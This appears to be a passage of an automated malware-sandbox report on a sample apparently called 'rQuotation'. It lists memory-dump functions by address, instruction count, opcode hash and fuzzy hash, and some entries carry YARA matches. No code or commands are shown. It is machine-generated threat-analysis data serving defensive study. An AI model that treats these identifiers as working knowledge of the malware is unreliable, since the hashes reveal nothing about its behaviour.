                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0b90761fba158bbfc1b12493d8682745e111e974d8ccf16cecec7bd37a06649d
                                                                                                                                                                                                                                                • Instruction ID: 3fce8f6d9ec7e157bd734e8a102da1d89b5c2957a57e774eb5373bd684c9769f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b90761fba158bbfc1b12493d8682745e111e974d8ccf16cecec7bd37a06649d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B41BF726046469FC321DF68C840AAAF7E9FFC8700F14462DFA9597690E730E914C7A6
                                                                                                                                                                                                                                                Function 016C4859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9e6d735d8869bac9a79002cbd0d47388b3324c79e6833394dcf3917dee3563b5
                                                                                                                                                                                                                                                • Instruction ID: 9fc256c51c5dd0df3134f2ff49c28d2e56a6628e3c09916bc35d618156a4dd11
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d735d8869bac9a79002cbd0d47388b3324c79e6833394dcf3917dee3563b5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4241D1706043128BD725DF28DCA4B7ABBEAEF80B64F14452DEA568B391DF30D851CB91
                                                                                                                                                                                                                                                Function 016B8B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dead6040eb4ac0db764d4e6edea12b444390a6f5199367c99875f9cebf58bfab
                                                                                                                                                                                                                                                • Instruction ID: d8cdec8a93c144cbd0a616b6e664edd8c7dd6a24267185990af51ef9612a2709
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dead6040eb4ac0db764d4e6edea12b444390a6f5199367c99875f9cebf58bfab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56419FB1A01605CFCB15DF69CD809EDB7FAFF98720B10862ED466A7350D734A981CB40
                                                                                                                                                                                                                                                Function 0084E523 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                • Instruction ID: 9fd5708bfe9332b5d086dc634c848460829fc945baa29568769cacb9a5760e71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD31731165C6F14ED31E836D48BD675AEC18E5720174EC2FEDADA5F2F3C4888408D3A5
                                                                                                                                                                                                                                                Function 016D02E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                                • Instruction ID: d297c3d4d77215c50f03e44e960dafe0a51ed5c1503406506b8eb371b7491a45
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9312332E04246AFDB228B6CCC44BABBFE9EF14350F0541A9F815D7352CB749885CBA4
                                                                                                                                                                                                                                                Function 0084E667 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d7ce2eca9dd3617f46de3df0b45361fe70f8a34671aa2a4a46ae7171dc3dc34a
                                                                                                                                                                                                                                                • Instruction ID: 61a52d5d3cdbef60ff4faa6ef59bebef46615c465bf5e5529e0c6f095d98d2bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7ce2eca9dd3617f46de3df0b45361fe70f8a34671aa2a4a46ae7171dc3dc34a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56310535A042489FC719DB7CC8819ABBBE2FFA9300F56C59DD856CB256C530A805C790
                                                                                                                                                                                                                                                Function 0176E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9bc5fd67c059672e286d7e9276ea925c1b627097aa387feb4776e3838c90e096
                                                                                                                                                                                                                                                • Instruction ID: 675fed3a8e123e8c79f9ad6ec03dc11ed298a046d075ee6a8bbdfcf768517a77
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bc5fd67c059672e286d7e9276ea925c1b627097aa387feb4776e3838c90e096
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3431A875B41706ABD722DF658C81F6BBAF9AB59B50F000028FA00AB3D1DEA4DC00D7E4
                                                                                                                                                                                                                                                Function 01774B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: da8eed3654f7ac1b0330bec50f2f33a36069c90a1eb4e954b1fb03d60a62b28c
                                                                                                                                                                                                                                                • Instruction ID: 2970f013085eb16f3c4a800cd2410a90638ad9f4d18231bafd78601ac6c94198
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da8eed3654f7ac1b0330bec50f2f33a36069c90a1eb4e954b1fb03d60a62b28c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB31AF726052018FCB21DF19D880F26B7E6FB84360F0A846EFA968B265D730AC40CF95
                                                                                                                                                                                                                                                Function 016C4260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0a36f51af30ef664fefcfe987a39ee5fc2b559e9d4325bcb4895b7f8e8cce3fa
                                                                                                                                                                                                                                                • Instruction ID: 73757196659d4ff25201d658e68a7e5bbd38e395ec05e5441d10a207a04feb75
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a36f51af30ef664fefcfe987a39ee5fc2b559e9d4325bcb4895b7f8e8cce3fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E441A031204B45DFD722CF29C895FE6BBE9FB49714F10842EE65A8B250CB74E805CB60
                                                                                                                                                                                                                                                Function 01774BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b2081de28b6cd6277be010c5d2899d8f0bca0c414d852c780f3311c047c77df1
                                                                                                                                                                                                                                                • Instruction ID: dbadaba7f3941031754920adf9444d1912c07102531e90db6df669899a449d2a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2081de28b6cd6277be010c5d2899d8f0bca0c414d852c780f3311c047c77df1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9318D726043019FDB20DF28C891F2AB7E5FB84720F09496DFA569B295E730EC44CB96
                                                                                                                                                                                                                                                Function 0173EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c0e42eacbc1ac984e468abcb46773f131a6cf6a2422cb5c9e0ba5fdba12a46e3
                                                                                                                                                                                                                                                • Instruction ID: f83fa23a63fdbc9140bd305ebe4a09cf952f5faeab3ffa666c1bfbd2e5279921
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0e42eacbc1ac984e468abcb46773f131a6cf6a2422cb5c9e0ba5fdba12a46e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0931CF726016869BF33B575D8D48F69FBD9BB80B40F1900A4AB458B7D3DF28D841C625
                                                                                                                                                                                                                                                Function 017861C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f85885612a3ab20504cc11cac8ad569e8e5cb578e57683f04af8cb8cb6b6d275
                                                                                                                                                                                                                                                • Instruction ID: ab9a47e56f3ae2d8d61f2eac22450db2b8e9a0b98131e1dd1a1bcd6299cac7b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f85885612a3ab20504cc11cac8ad569e8e5cb578e57683f04af8cb8cb6b6d275
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B31AF75A4021AEBDB15EF98CC40FAEF7B5FB48B40F4541A8F901AB284D770AD40CBA4
                                                                                                                                                                                                                                                Function 0176483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 15af367bf671139b42e505fdb073af24937b3c380ddbe667aaac25e791fee59c
                                                                                                                                                                                                                                                • Instruction ID: 01fc551925d87e6f36aee93afb38617663b030b1561a0cb7af0b6fdf2bed1576
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15af367bf671139b42e505fdb073af24937b3c380ddbe667aaac25e791fee59c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A316776A4012DABCF21DF54DC88BDEBBFAEB98310F1100A5A909A7250CA30DE51CF90
                                                                                                                                                                                                                                                Function 016EEB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f8f52f9eb337c221a7a55cdd38047308b4fe3c99740bba4379defa61eab317a6
                                                                                                                                                                                                                                                • Instruction ID: e17c4fcc2750d9dd2cccc0a8ac3978655848de3b572f2101a2329338f18cd2c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f52f9eb337c221a7a55cdd38047308b4fe3c99740bba4379defa61eab317a6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1031E472E01219EFDB21DFA9CD44AAEBBF9EF04750F014569E516E7250D3719E018BA0
                                                                                                                                                                                                                                                Function 01786BD7 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6b6c6fe3eb0d4c3173b658710f37202dc8a4548f5db39f70a2a898d00ca640dd
                                                                                                                                                                                                                                                • Instruction ID: 46381c2f9afed2d27803c474b678092849ac559843381631bf79d7e429c6181f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b6c6fe3eb0d4c3173b658710f37202dc8a4548f5db39f70a2a898d00ca640dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6318D31B00204ABCB24CF2DD8C5A9BBBE5FF49610F4584A9F909DF24AD370E945CBA4
                                                                                                                                                                                                                                                Function 017860B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0dd23bda7cff654bd498728e362a34f25c92224c884f747f2fb13d708f9eb0f9
                                                                                                                                                                                                                                                • Instruction ID: fa70c9cf5d0ec4c29dce22e6cd22382e4aad01edbac0ed3e0f760acc4f395c88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dd23bda7cff654bd498728e362a34f25c92224c884f747f2fb13d708f9eb0f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5318271E80606BBDB12AB99CC50F6AF7BAAB44754F04406DF506EB352DA70DD018B90
                                                                                                                                                                                                                                                Function 016C07AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3407f9a0c92d240ad12e03f08085c84c7d3e42ff5d022aa808b0feee283dfaa4
                                                                                                                                                                                                                                                • Instruction ID: bd6dd4be128c5766cea27a10cc689d5b1c57b2961c0adfd4db6bfa18a7b78401
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3407f9a0c92d240ad12e03f08085c84c7d3e42ff5d022aa808b0feee283dfaa4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7431EA7AA05712DBCB12DE588C80E7BBBA6EF94A50F02852DFD5697310DB30DC0187E5
                                                                                                                                                                                                                                                Function 016C8550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 597f794d5f2ea5f40a19cd4493aa5ac054af9c8e9a9335d2a016742016a6e295
                                                                                                                                                                                                                                                • Instruction ID: 6c874bc675d2e5a0e29fcb75f3ae98883d37afdf3d07aa83f0dedd9d32353a84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 597f794d5f2ea5f40a19cd4493aa5ac054af9c8e9a9335d2a016742016a6e295
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 843189716093118FE760CF19C840B6AFBE9EB98B00F444A6DE98497351D7B5E844CBA2
                                                                                                                                                                                                                                                Function 0086F2E3 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a895028b9b95a9a178d643ba5efd069191017202b919089ba0efeedd2cfea503
                                                                                                                                                                                                                                                • Instruction ID: b3147aed5ce1650174027367eee8e29e29cce31a9a8c6a38fb4d6ce5129aa73d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a895028b9b95a9a178d643ba5efd069191017202b919089ba0efeedd2cfea503
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5331CE72B10A265BD354CE3AE88065AF7E2FB88310B558739DA19C3B41E774F961CBD0
                                                                                                                                                                                                                                                Function 00842EE0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c5a1a776656e2f2a2cc289e26f917200bce77c2e4ce335527c2f60726a0fe53
                                                                                                                                                                                                                                                • Instruction ID: ef0eb154be5c8e16390e9fbe671fa06387bccff79703724e9685bbb9c91b085b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c5a1a776656e2f2a2cc289e26f917200bce77c2e4ce335527c2f60726a0fe53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1831A072A14B148FD368CA6ED845617F7E5FB88310B81862DE89AD7B50D675EC01CB80
                                                                                                                                                                                                                                                Function 016FA6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                                                                                • Instruction ID: f10efcbc63426ff809576aa1511642546cec915287c26b911085153edccbbf56
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD312CB6B04B01AFD761CFA9DD41B67BBF8BB48650F14052DA69AC3751E730E9008B60
                                                                                                                                                                                                                                                Function 0176EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b5c3fe76736e38203740858de8d8d130f1eff3352aca9d0ad3fc657245b07650
                                                                                                                                                                                                                                                • Instruction ID: efced78494da17ec632035cf282c56052296e272cfe5899201901a45ab61f8fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5c3fe76736e38203740858de8d8d130f1eff3352aca9d0ad3fc657245b07650
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631A9B59093018FCB11DF19C590A5AFBFAFF89614F4449AEE8889B215D730D984CFA2
                                                                                                                                                                                                                                                Function 016E438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 631c61ce7dcee01b4a2c2e56b86a59da806cceb533478051a69a003ec17d685e
                                                                                                                                                                                                                                                • Instruction ID: 8c2bec4eea287eaff16c8e326306ea359c92b1bfab50b0db57a1848c3a30f92c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631c61ce7dcee01b4a2c2e56b86a59da806cceb533478051a69a003ec17d685e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD31C471B02205DFD720DFB9CD89A6EB7FAEB94304F008669E106D7654DB30EA41CB90
                                                                                                                                                                                                                                                Function 016BCB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                                                                                • Instruction ID: 07e2d452136972d5d5a88a961e2c57fb766507bd48eb5170db39f6ddd6c52d7a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
